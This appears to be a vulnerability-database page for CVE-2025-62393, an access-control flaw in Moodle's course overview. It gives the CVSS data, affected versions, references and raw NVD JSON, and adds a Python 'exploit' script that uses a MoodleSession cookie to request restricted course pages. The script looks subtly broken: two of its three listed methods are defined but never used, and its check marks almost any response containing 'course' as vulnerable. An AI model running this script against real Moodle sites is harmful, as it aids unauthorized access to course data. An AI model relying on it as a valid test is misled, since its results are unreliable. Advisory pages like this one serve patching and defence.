Security Vulnerability Report
CVE-2025-62393 CVSS 4.3 MEDIUM

CVE-2025-62393

Published: 2025-10-23 12:15:31
Last Modified: 2025-11-14 19:39:55

Description

A flaw was found in the course overview output function where user access permissions were not fully enforced. This could allow unauthorized users to view information about courses they should not have access to, potentially exposing limited course details.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE
Moodle LMS affected versions (see the official advisory for the specific versions)
Red Hat OpenStack Platform (per Red Hat Bugzilla 2404426)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62393 PoC - Moodle Course Overview Access Control Bypass
# This PoC demonstrates the permission bypass in course overview output function
import requests
import sys


def exploit_moodle_cve_2025_62393(target_url, course_id, session_cookie):
    """
    Exploit for CVE-2025-62393: Moodle course overview access control bypass

    Requirements:
    - Valid low-privilege user session
    - Target course ID that user should not have access to

    Usage: python exploit.py <target_url> <course_id> <session_cookie>
    """
    headers = {
        'Cookie': f'MoodleSession={session_cookie}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Method 1: Direct course overview page access
    overview_url = f"{target_url}/course/overview.php?id={course_id}"
    # Method 2: Dashboard course overview endpoint
    dashboard_url = f"{target_url}/my/"
    # Method 3: Web service API endpoint
    api_url = f"{target_url}/lib/ajax/service.php?sesskey=&info=core_course_get_courses"

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Course ID: {course_id}")

    # Attempt to access restricted course overview
    try:
        response = requests.get(overview_url, headers=headers, timeout=10)
        if response.status_code == 200:
            # Check if course information is returned without proper authorization
            if 'course' in response.text.lower() or 'enrolled' in response.text.lower():
                print("[+] VULNERABLE: Course information exposed without proper authorization")
                print(f"[+] Response length: {len(response.text)} bytes")
                return True
            else:
                print("[-] Course info not found in response")
                return False
        else:
            print(f"[-] HTTP {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python exploit.py <target_url> <course_id> <session_cookie>")
        sys.exit(1)
    exploit_moodle_cve_2025_62393(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://access.redhat.com/security/cve/CVE-2025-62393 (Third Party Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2404426 (Issue Tracking, Third Party Advisory)
https://moodle.org/mod/forum/discuss.php?d=470381 (Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62393",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-23T12:15:31.073",
    "lastModified": "2025-11-14T19:39:55.383",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A flaw was found in the course overview output function where user access permissions were not fully enforced. This could allow unauthorized users to view information about courses they should not have access to, potentially exposing limited course details."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "672DBB86-D5A8-41B6-B6F3-8E323E9C21F0"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/security/cve/CVE-2025-62393", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404426", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]},
      {"url": "https://moodle.org/mod/forum/discuss.php?d=470381", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}
    ]
  }
}
```